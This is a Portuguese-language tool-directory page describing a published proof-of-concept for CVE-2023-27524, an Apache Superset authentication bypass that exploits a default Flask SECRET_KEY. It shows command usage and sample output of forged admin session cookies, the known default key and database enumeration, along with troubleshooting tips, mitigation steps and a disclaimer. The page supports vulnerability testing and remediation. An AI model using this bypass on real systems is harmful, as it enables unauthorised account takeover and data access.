Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27524 — PoC básico para CVE-2023-27524: Configuração Padrão Insegura no Apache Superset | Kitploit
Ferramentas/GitHubGitHub/horizon3ai/cve-2023-27524
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoConfiguração Incorreta
GitHubhorizon3ai/cve-2023-27524

CVE-2023-27524

PoC básico para CVE-2023-27524: Configuração Padrão Insegura no Apache Superset

Ver Repositório
113301há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-27524: Bypass de Autenticação do Apache Superset

Script para verificar se um servidor Apache Superset está sendo executado com uma configuração padrão insegura (CVE-2023-27524). O script verifica se os cookies de sessão de um servidor Superset estão assinados com qualquer SECRET_KEY padrão conhecida do Flask.

A flag --validate pode ser usada para validar a explorabilidade enumerando bancos de dados usando a API do Superset.

Post do Blog

Mais detalhes aqui: https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset Postagem de acompanhamento: https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/

Uso

root@kitploit:~
% python3 CVE-2023-27524.py -h                           
usage: CVE-2023-27524.py [-h] --url URL [--id ID] [--validate] [--timeout TIMEOUT]

optional arguments:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of Superset instance
  --id ID               User ID to forge session cookie for, default=1
  --validate, -v        Validate login
  --timeout TIMEOUT, -t TIMEOUT
                        Time to wait before using forged session cookie, default=5s

Exemplo Básico

root@kitploit:~
% python3 CVE-2023-27524.py -u http://10.0.220.200:8088   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg

Exemplo com Prova de Explorabilidade

root@kitploit:~
% python3 CVE-2023-27524.py -u http://10.0.220.200:8088 --validate
Got session cookie: eyJjc3JmX3Rva2VuIjoiMTY0ZWExNWJlMDhmNWM2ZmZmOGFhNTExZThhMjUzYjM1YWY5MTdlNiIsImxvY2FsZSI6ImVuIn0.ZEc07w.CAkEJ7AtDlpfvVok-w0JQVcJqa0
Decoded session cookie: {'csrf_token': '164ea15be08f5c6fff8aa511e8a253b35af917e6', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc07w.fOAFW0_5gLUTkIbeR_5AqEz2DoU
Sleeping 5 seconds before using forged cookie to account for time drift...
Got 302 on login, forged cookie appears to have been accepted
Enumerating databases
Found database examples
Found database PostgreSQL
Done enumerating databases

Solução de Problemas

Se o script detectar uma SECRET_KEY em uso, mas não conseguir validar a explorabilidade, pode ser porque:

  • o servidor de destino está integrado com SSO e os IDs de usuário não seguem o formato de incremento automático (tente o argumento --id para definir um user_id específico se você souber)
  • nenhum usuário foi configurado ainda
  • diferença de tempo entre o destino e sua máquina. Os cookies de sessão do Flask são assinados com um elemento de timestamp. Tente aumentar o intervalo de sleep de 5 segundos no código.

Mitigações

Siga as instruções aqui para gerar e configurar uma SECRET_KEY do Flask. A ferramenta de CLI superset pode ser usada para rotacionar a SECRET_KEY para que as informações de conexão de banco de dados existentes sejam preservadas.

Siga a Equipe de Ataque da Horizon3.ai no Twitter para as últimas pesquisas de segurança:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo mau uso do software. Use com responsabilidade.

Baixar ferramenta